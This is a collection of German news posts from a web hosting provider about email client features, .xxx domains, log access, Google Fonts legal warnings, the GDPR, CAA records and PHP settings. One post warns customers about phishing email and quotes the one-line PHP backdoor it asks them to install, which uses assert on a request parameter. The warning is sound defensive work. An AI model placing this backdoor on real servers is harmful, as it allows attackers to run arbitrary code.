Neue E-Mail-Funktionen mit dem eM Client

Neben Outlook und Thunderbird ist die Software eM Client einer der beliebtesten E-Mail-Clients im deutschsprachigen Raum. Viele unserer Kundinnen und Kunden schätzen die einfache Bedienung und die direkte Unterstützung unserer Open-Xchange-Funktionen (Synchronisation von Kalendern und Kontakten).

Durch bei uns installierte Erweiterungen unterstützen unsere Mailserver jetzt auch zwei besondere Funktionen im eM Client.

Zurückstellen-Funktion

Mit der Zurückstellen-Funktion (“snooze”) können Emails, die jetzt nicht beantwortet werden müssen, auf später verschoben werden. Sie verschwinden aus dem Posteingang – und tauchen genau dann wieder auf, wenn Sie sie wirklich brauchen. Dadurch bleiben Sie fokussiert auf das Wesentliche – und Ihr Posteingang bleibt aufgeräumt. Die Entwickler der Software beschreiben hier, wie die Zurückstellen-Funktion nutzbar ist.

Screenshot aus eM Client: Zurückstellen von E-Mails

Nachverfolgung selbst gesendeter E-Mails

Unsere Mailserver unterstützen jetzt auch die Nachverfolgung selbst gesendeter E-Mails mit Benachrichtigungen im eM Client. Hier gibt es in zwei verschiedenen Varianten:

  • Benachrichtigung, wenn man eine Antwort auf eine bestimmte E-Mail bekommt
  • Benachrichtigung, wenn man bis zu einem festgelegten Zeitpunkt noch keine Antwort auf eine bestimmte E-Mail bekommen hat.

Beide Funktionen sind hilfreich, um kein Thema aus den Augen zu verlieren.

Screenshot aus eM Client: Nachverfolgung

Die verschiedenen Markierungen werden serverseitig gespeichert, d.h. auch wenn Sie an einem anderen PC mit dem eM Client auf die E-Mails zugreifen oder im Team zusammenarbeiten, werden die Erinnerungen angezeigt.

.xxx-Domains jetzt für alle – neue Chancen und wichtiger Markenschutz

Logo der Top-Level-Domain .xxx

Seit ihrer Einführung im Jahr 2011 waren .xxx-Domains nur für Unternehmen und Anbieter aus der Erotik-Branche registrierbar . Für alle anderen war lediglich eine sogenannte “Blocking”-Option möglich, um zu verhindern, dass der eigene Markenname unter dieser Endung registriert wird – eine reine Schutzmaßnahme ohne Nutzungsmöglichkeit.

Die bisherigen Zugangsbeschränkungen für .xxx-Domains wurden jetzt vollständig aufgehoben. Jede:r kann nun eine .xxx-Domain registrieren – unabhängig von Branche oder Inhalt. Damit steht diese Endung allen offen, die entweder eine kreative Nutzung planen oder ihren Markennamen aktiv schützen möchten.

Neue Möglichkeiten für kreative Projekte

Die Freigabe eröffnet interessante Optionen – auch jenseits klassischer Erwachseneninhalte. Wer mit bewusst provokativen oder thematisch passenden Projekten arbeitet, kann mit einer .xxx-Domain gezielt Aufmerksamkeit erzeugen. Gleichzeitig bleibt die Nutzung selbstverständlich weiterhin auch für Inhalte aus dem Erotikbereich möglich.

Markenschutz bleibt unverändert wichtig

Gerade weil nun jede:r eine .xxx-Domain registrieren und nutzen kann, gewinnt der Schutz von Markennamen gegen eine missbräuchliche Nutzung an Bedeutung – eine vorbeugende Registrierung kann daher sinnvoll sein. Das gilt nicht nur für .xxx, sondern auch für die weiteren, thematisch verwandten Domainendungen .adult, .porn und .sex.

Gerne unterstützen wir Sie bei der Registrierung oder beantworten Ihre Fragen zum Domain- und Markenschutz. Sprechen Sie uns einfach an!

Echtzeit-Zugriff auf Webserver-Logdateien

Wir freuen uns, Ihnen ein praktisches neues Feature vorstellen zu können: Ab sofort können Sie die Webserver-Logdateien Ihrer Webseiten (access_log und error_log) nahezu in Echtzeit einsehen – direkt per SSH oder SFTP über Ihren Benutzeraccount auf dem Webserver. Die Logdateien der letzten 10 Tage befinden sich im Verzeichnis .logs.

Ob zur Fehlersuche, zur Analyse von Besucherzugriffen oder zur Kontrolle eigener Skripte: Der Zugriff auf die Logdateien hilft dabei, Probleme schneller zu erkennen und besser zu verstehen, was auf Ihrer Website passiert.

In unserem FAQ-Artikel Wie kann ich auf die Logdateien meiner Webseiten zugreifen? beschreiben wir ausführlich, welche Möglichkeiten hier neu zur Verfügung stehen. Unter anderem lassen sich die Logdateien auch automatisiert in einer Matomo-Instanz einbinden, um die Daten grafisch auswerten zu können.

Abmahnungen bei Verwendung von Google Fonts

Seit einigen Wochen berichten Betreiber:innen von Webseiten, dass sie Abmahnungen erhalten, die sich auf die Einbindung von Schriftarten von Google auf Webseiten beziehen. Einen zusammenfassenden Bericht über die Grundlage dieser Abmahnungen finden Sie unter anderem in einem Artikel in der Zeitschrift c’t: Angeblicher DSGVO-Verstoß: Abmahnwelle wegen Google Fonts.

Viele Webseiten verwenden z.B. ein WordPress-Theme mit Schriftarten, die von Google kostenfrei angeboten werden. Das Problem besteht nicht in der Verwendung dieser Schriften selbst, sondern darin, dass der Abruf von Servern von Google erfolgt und damit personenbezogene Daten (insb. die IP-Adresse der Besucher:innen) an Google in die USA übertragen werden. Dies ist – ohne explizite Zustimmung der Datenübertragung – rechtswidrig.

Google bietet die Schriften auch zum Download an und erlaubt es, sie lokal (z.B. auf unserem Webserver) zu installieren und so auf der Webseite einzubinden. Die Verwendung der Google-Schriftarten wird damit wieder rechtskonform.

Verschiedene Webseiten bieten Tools an, mit denen man die Verwendung von Google-Fonts auf der eigenen Webseite überprüfen kann; beispielhaft sei hier der Dienst von e-recht24.de genannt: Achtung Abmahnung: Prüfen Sie jetzt die Einbindung von Google Fonts.

Für WordPress gibt es inzwischen zahlreiche Plugins, die dazu dienen, direkte Verknüpfungen zu den Google-Schriftarten zu entfernen und diese stattdessen lokal einzubinden: https://wordpress.org/plugins/search/google+fonts/. Auch für andere Content-Management-Systeme gibt es fertige Lösungen. Bitte zögern Sie nicht, diese einzusetzen, um eine Abmahnung zu vermeiden.

Umgang mit einer Abmahnung

Sollten Sie bereits eine Abmahnung erhalten haben, enthält diese in der Regel eine oder mehrere dieser Forderungen:

  • Abgabe einer strafbewehrten Unterlassungs- und Verpflichtungserklärung
  • Auskunftserteilung über Datenverarbeitung
  • Zahlung von Schadensersatz
  • Zahlung von Rechtsverfolgungskosten

Wir können und möchten hier keine Rechtsberatung leisten, zumal eine Vielzahl verschiedener Abmahnungen im Umlauf ist. In einigen Fällen konnten Webseiten-Betreiber:innen anhand von Logdateien auch nachweisen, dass die Abrufe automatisiert erfolgten. Es macht auch einen Unterschied, ob die Abmahnung von einer Privatperson, einer Körperschaft oder einem Anwalt kommt.

Wir empfehlen jedoch in jedem Fall, die externe Einbindung von Google Fonts umgehend zu beenden und ggf. zum Beispiel mit einem Musterschreiben oder einem generierten Antwortschreiben (kostenlos) auf die Abmahnung zu reagieren.

Passwort-Reset für Endkunden von Resellern

Bereits seit einiger Zeit lässt sich in unseren Reseller-Verträgen in den Einstellungen konfigurieren, ob die eigenen Nutzer:innen für my.securehost.de einen Passwort-Reset durchführen dürfen.

Die eigentliche Passwort-Reset-Funktion fehlte allerdings bisher noch. Sie ist inzwischen unter https://my.securehost.de/ verlinkt und führt zur Seite https://my.securehost.de/reset-password:

Dialog für den Passwort-Reset unter https://my.securehost.de/reset-password

Mit dem Ausfüllen des Formulars wird – sofern vollständig und freigeschaltet – eine E-Mail von no-reply@securehost.de verschickt. Diese E-Mail enthält einen Link, der eine Stunde lang gültig ist. Durch das Anklicken des Links wird nach einer weiteren Bestätigungsabfrage ein neues Passwort für den Kundenmenüzugang gesetzt und angezeigt.

Muster einer E-Mail, wie Sie beim Passwort-Reset an Account-Inhaber:innen verschickt wird

Was ändert sich durch die DSGVO?

Am Freitag, den 25.05.2018 tritt die neue EU-Datenschutzgrundverordnung (DSGVO / englisch: GDPR) in Kraft. Für Verbraucher bringt die DSGVO viel Gutes mit: Es gibt ein Recht auf Datenlöschung, ein Recht auf Widerspruch und ein Auskunftsrecht. Umfangreiche Informationspflichten sollen Transparenz bei der Datenverarbeitung sicherstellen. Das Prinzip der Datensparsamkeit steht künftig an oberster Stelle – nur Daten, die tatsächlich für die Erfüllung einer Aufgabe benötigt werden, dürfen erhoben, gespeichert und verarbeitet werden.

Leider bringen neue Gesetze oft auch eine Menge neuer Bürokratie mit sich. Besonders kleine Unternehmen und auch Privatpersonen mit eigenen Webseiten fühlen sich von den umfangreichen DSGVO-Regelungen überfordert. Wir möchten Ihnen in diesem Artikel einen kleinen Überblick darüber geben, was sich durch die DSGVO für die meisten unserer Kunden ändert und an welcher Stelle unsere Dienste mit der DSGVO in Berührung kommen. Der Artikel kann keine Rechtsberatung ersetzen und erhebt auch nicht den Anspruch, vollumfänglich über die DSGVO zu informieren – das ist angesichts der Fülle der Regeln kaum möglich.

Was muss ich als Betreiber einer Webseite beachten?

SSL-Zertifikate: Sobald Sie irgendeine Art von personenbezogenen Daten auf Ihrer Webseite erfassen – sei es über ein Kontaktformular, eine Newsletter-Anmeldung, einen Online-Shop oder sonstige Funktionen, bei denen ein Nutzer Ihnen gegenüber etwas Preis gibt, muss die jeweilige Webseite über ein SSL-Zertifikat (https://…) abgesichert werden. In vielen unserer Hosting-Pakete sind SSL-Zertifikate im Preis bereits enthalten; zusätzliche Zertifikate können ab 6,- Euro pro Jahr (Reseller: 3,- Euro pro Jahr) gebucht werden. Informationen zu den Unterschieden verschiedener Zertifikatstypen finden Sie auf unserer Webseite. Die Bestellung eines Zertifikats erfolgt formlos per E-Mail.

Datenschutzerklärung: Sie müssen in einer Datenschutzerklärung auf Ihrer Webseite angeben, wie Sie mit den Daten Ihrer Besucher umgehen. In erster Linie geht es dabei darum, welche Daten Sie (oder wir als Ihr Webhoster) von den Besuchern Ihrer Webseite speichern. Zur Erstellung einer DSGVO-konformen Datenschutzerklärung gibt es zahlreiche kostenlose und kostenpflichtige Generatoren im Internet; im Zweifelsfall konsultieren Sie bitte unbedingt einen Juristen. Bezüglich der von uns erstellten Logdateien ist wichtig, welche Daten wir serverseitig speichern. Bitte beachten Sie dazu folgende FAQ-Artikel: Wie lange werden die Logdateien aufbewahrt? und Wie sind die HTTP Access Logs aufgebaut?

Auftragsverarbeitungsvertrag: Als gewerblicher Betreiber einer Webseite sollten Sie mit uns einen Auftragsverarbeitungsvertrag abschließen. In diesem Vertrag ist geregelt, wie wir Ihre und die Daten Ihrer Kunden auf unseren Servern verarbeiten. Bestandteil des AV-Vertrags sind die “Technischen und organisatorischen Maßnahmen”, die wir anwenden, um Ihre Daten zu schützen. Der Abschluss eines AV-Vertrags mit uns ist hier unter Verwendung Ihrer persönlichen Zugangsdaten zum Kundenmenü möglich.

An dieser Stelle noch einmal der Hinweis: Diese Übersicht ist nicht vollständig. Je nach Branche und Art der Weise, wie Sie Daten erheben und verarbeiten, können und werden noch weitere Themen für Sie relevant sein, auf die wir hier nicht eingehen können.

Was ändert sich bei der Domainregistrierung?

Whois-Daten: Bei der Registrierung einer Domain wurden bisher bei den meisten Registrierungsstellen umfangreiche Daten des Domaininhabers, des administrativen Ansprechpartners und der technischen Kontakte abgefragt, darunter auch E-Mail-Adressen und Telefonnummern. Diese Daten wurden allerdings nicht nur bei den Registrierungsstellen gespeichert, sondern auch im öffentlichen Whois angezeigt. An beiden Punkten gibt es durch die DSGVO nun Änderungen. Einige Registrierungsstellen erfassen nur noch die Daten eines Domaininhabers; sowohl der administrative als auch der technische Kontakt entfällt bei diesen Top-Level-Domains (z.B. .de). Andere Registrierungsstellen erfassen weiterhin alle Daten, veröffentlichen im Whois aber nur noch einen kleinen Teil davon. Bei den meisten Top-Level-Domains wird im Falle einer Registrierung für eine Organisation der Name der Organisation und das Land, in dem die Organisation ihren Sitz hat, im Whois angezeigt. Bei Privatpersonen wird nur noch das Land des Inhabers angezeigt.

Vermittlung: Wie bisher kommt der Vertrag für eine Domainregistrierung zwischen dem Domaininhaber und der Registrierungsstelle zustande. Wir vermitteln diesen Vertrag und verwalten die Domains für Sie bei der Registrierungsstelle. Nach wie vor übermitteln wir Ihre Daten – je nach Top-Level-Domain – auch an Drittstaaten. Diese Übermittlung ist jedoch zwingende Voraussetzung dafür, die gewünschte Domain registrieren zu können.

Einrichtung von CAA-Records im Kundenmenü

Ab sofort lassen sich im DNS-Bereich des Kundenmenüs Einträge mit dem Typ “CAA” (Certification Authority Authorization) anlegen. Sie dienen der Überprüfung, ob eine bestimmte Zertifizierungsstelle (z.B. Comodo oder Let’s Encrypt) ein SSL-Zertifikat für die jeweilige Domain ausstellen darf. Die Prüfung wird seit September 2017 von allen Zertifizierungsstellen bei der Neuausstellung und Verlängerung von Zertifikaten durchgeführt.

Existieren für eine Domain keine CAA-Einträge, kann jede Zertifizierungsstelle ein Zertifikat für die Domain ausstellen. Wenn CAA-Einträge existieren, darf nur die angegebene Zertifizierungsstelle ein Zertifikat ausstellen. Auf diese Weise wird die missbräuchliche Ausstellung von Zertifikaten deutlich erschwert.

Mehr Informationen und Beispiele zur Nutzung von CAA-Records finden Sie unserem FAQ-Artikel: Was sind CAA-Einträge und wie funktionieren sie?

Probleme bei der Installation von Joomla

Aufgrund eines Programmierfehlers im Installer der aktuellen Joomla-Version 3.7.4 lässt sich diese nicht auf unseren Webservern installieren. Die Fortschrittsanzeige bei der Installation bleibt bei etwa 10% stehen, dann passiert nichts mehr.

Der Fehler ist den Joomla-Entwicklern bekannt und wird in der nächsten Joomla-Version behoben. Bitte nutzen Sie für eine Neuinstallation von Joomla bis dahin die Vorgängerversion 3.7.3 und nehmen dann ein Update auf die aktuelle Joomla-Version vor.

Update

Der Fehler wurde in der neuen Joomla Version 3.7.5 behoben.

Gefährlicher Spam an Inhaber von .ru-Domains

Wir erhielten heute von einem Kunden eine betrügerische Spam-Mail zur Prüfung, die momentan an Inhaber von .ru-Domains versendet wird. Diese stammt vorgeblich von der Registrierungsstelle RU-CENTER und enthält die Aufforderung, eine PHP-Datei mit folgendem Inhalt auf dem Webserver anzulegen:

<?php
 assert(stripslashes($_REQUEST[RUCENTER]));
 ?>

Dieser PHP-Befehl würde es Angreifern ermöglichen, beliebige PHP-Befehle auf dem Webserver auszuführen, so könnten beispielsweise Webseiten verändert oder Spam versendet werden.

Es gibt tatsächlich Dienste, bei denen es erforderlich ist, einen bestimmten Code auf die eigene Webseite einzufügen – zum Beispiel um bestimmte Funktionen zu ermöglichen oder die Inhaberschaft einer Domain zu validieren, z.B. die Google Webmaster Tools, Piwik und viele mehr. Sie bekommen eine entsprechende Nachricht aber nur dann, wenn Sie diesen Dienst explizit nutzen wollen und sich dort angemeldet haben. In der Regel versenden diese Dienste auch keine E-Mail, sondern der einzufügende Code wird Ihnen beim Anmeldeprozess angezeigt. Zudem handelt es sich in solchen Fällen auch nie um PHP-Befehle. Wenn Sie eine solche E-Mail unaufgefordert erhalten, handelt es sich fast immer um Spam.

Wir sind froh, dass der Kunde sich an uns gewandt hat und können nur alle Kunden ermuntern, im Zweifelsfall lieber nachzufragen.

PHP-Version im Kundenmenü einstellbar

Ab sofort können Sie die für Ihre Webseiten genutzte PHP-Version mit zwei Klicks über unser Kundenmenü einstellen. Sie finden die neue Option im Menüpunkt “PHP”, der sich unter den Einstellungen Ihres Hosting-Pakets befindet. Die Einstellung gilt für alle Domains in Ihrem Hosting-Paket, eine Auswahl unterschiedlicher PHP-Versionen für einzelne Domains eines Pakets ist momentan noch nicht möglich.

Die Auswahl der PHP-Version ist jetzt im Kundenmenü möglich.

Sie können die PHP-Version auch wie gehabt per .htaccess-Konfigurationsdatei auf dem Webserver festlegen, diese Einstellung überschreibt dabei die im Kundenmenü gewählte PHP-Version. Auf diese Weise können Sie weiterhin für verschiedene Domains/Verzeichnisse unterschiedliche PHP-Versionen nutzen.

Die aktuell für Ihre Webseite konfigurierte PHP-Version können Sie über den PHP-Befehl phpinfo() ermitteln. Laden Sie dazu einfach unser vorgefertigtes PHP-Script herunter, das Sie dann per (S)FTP im gewünschten Webspace-Verzeichnis ablegen und dort über Ihren Web-Browser aufrufen (z.B. http://meine-domain.de/info.php).